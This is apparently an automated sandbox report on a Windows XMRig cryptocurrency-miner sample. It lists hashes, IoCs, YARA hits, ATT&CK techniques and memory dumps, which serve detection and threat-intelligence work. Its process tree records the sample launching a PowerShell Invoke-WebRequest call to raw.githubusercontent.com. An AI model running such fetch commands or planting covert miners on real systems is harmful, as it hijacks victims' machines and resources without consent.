xmrig | 658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5

General

Target

658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe
Size

1.6MB
MD5

f7951b85decd48f09f4b091ab9f2aab2
SHA1

792d2221be31beb9c799f80f031d9a9d501f4135
SHA256

658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5
SHA512

e24dda67756d36f50d4fb603b493a0cb4d06e364ac2e377aa6feab54dec46961ae0e891a26b9a157486b99dbfe0348fc4467407c50839f9e146263fbcbeccb6a
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkibTJH+2Q/ynKeWYlZ3pBjqlx7TovQmVV4dThen9zS:Lz071uv4BPMkibTIA5lCx7kvRWa4pXYC

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/5056-129-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-265-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-267-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-268-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-269-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-270-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-271-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-272-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-273-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-274-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-275-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig
behavioral2/memory/5056-276-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	xmrig

Blocklisted process makes network request 21 IoCs

flow	pid	Process
3	4080	powershell.exe
6	4080	powershell.exe
18	4080	powershell.exe
19	4080	powershell.exe
21	4080	powershell.exe
23	4080	powershell.exe
26	4080	powershell.exe
27	4080	powershell.exe
28	4080	powershell.exe
29	4080	powershell.exe
30	4080	powershell.exe
31	4080	powershell.exe
32	4080	powershell.exe
33	4080	powershell.exe
34	4080	powershell.exe
35	4080	powershell.exe
36	4080	powershell.exe
37	4080	powershell.exe
38	4080	powershell.exe
39	4080	powershell.exe
40	4080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4080	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5056-0-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-129-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-265-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-267-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-268-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-269-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-270-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-271-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-272-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-273-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-274-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-275-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx
behavioral2/memory/5056-276-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp	upx

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4080	powershell.exe
4080	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	5056	658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeLockMemoryPrivilege	5056	658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5056 wrote to memory of 4080	5056	658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe	84
PID 5056 wrote to memory of 4080	5056	658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe	84

C:\Users\Admin\AppData\Local\Temp\658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe
"C:\Users\Admin\AppData\Local\Temp\658f745a21a3b48d0c733077a4e23b5b61f3346548a890341dce036c9cc424b5.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysrbnncb.nz5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4080-230-0x00007FF977F53000-0x00007FF977F55000-memory.dmp

Filesize
8KB

Download
memory/4080-266-0x00007FF977F50000-0x00007FF978A11000-memory.dmp

Filesize
10.8MB

Download
memory/4080-2-0x00007FF977F53000-0x00007FF977F55000-memory.dmp

Filesize
8KB

Download
memory/4080-4-0x0000016EB0B60000-0x0000016EB0B82000-memory.dmp

Filesize
136KB

Download
memory/4080-13-0x00007FF977F50000-0x00007FF978A11000-memory.dmp

Filesize
10.8MB

Download
memory/4080-14-0x00007FF977F50000-0x00007FF978A11000-memory.dmp

Filesize
10.8MB

Download
memory/4080-15-0x0000016EB1A40000-0x0000016EB21E6000-memory.dmp

Filesize
7.6MB

Download
memory/4080-17-0x00007FF977F50000-0x00007FF978A11000-memory.dmp

Filesize
10.8MB

Download
memory/4080-233-0x00007FF977F50000-0x00007FF978A11000-memory.dmp

Filesize
10.8MB

Download
memory/5056-265-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-270-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-0-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-1-0x000002FDED210000-0x000002FDED220000-memory.dmp

Filesize
64KB

Download
memory/5056-267-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-268-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-269-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-129-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-271-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-272-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-273-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-274-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-275-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download
memory/5056-276-0x00007FF6D9880000-0x00007FF6D9C72000-memory.dmp

Filesize
3.9MB

Download

Analysis

Sharing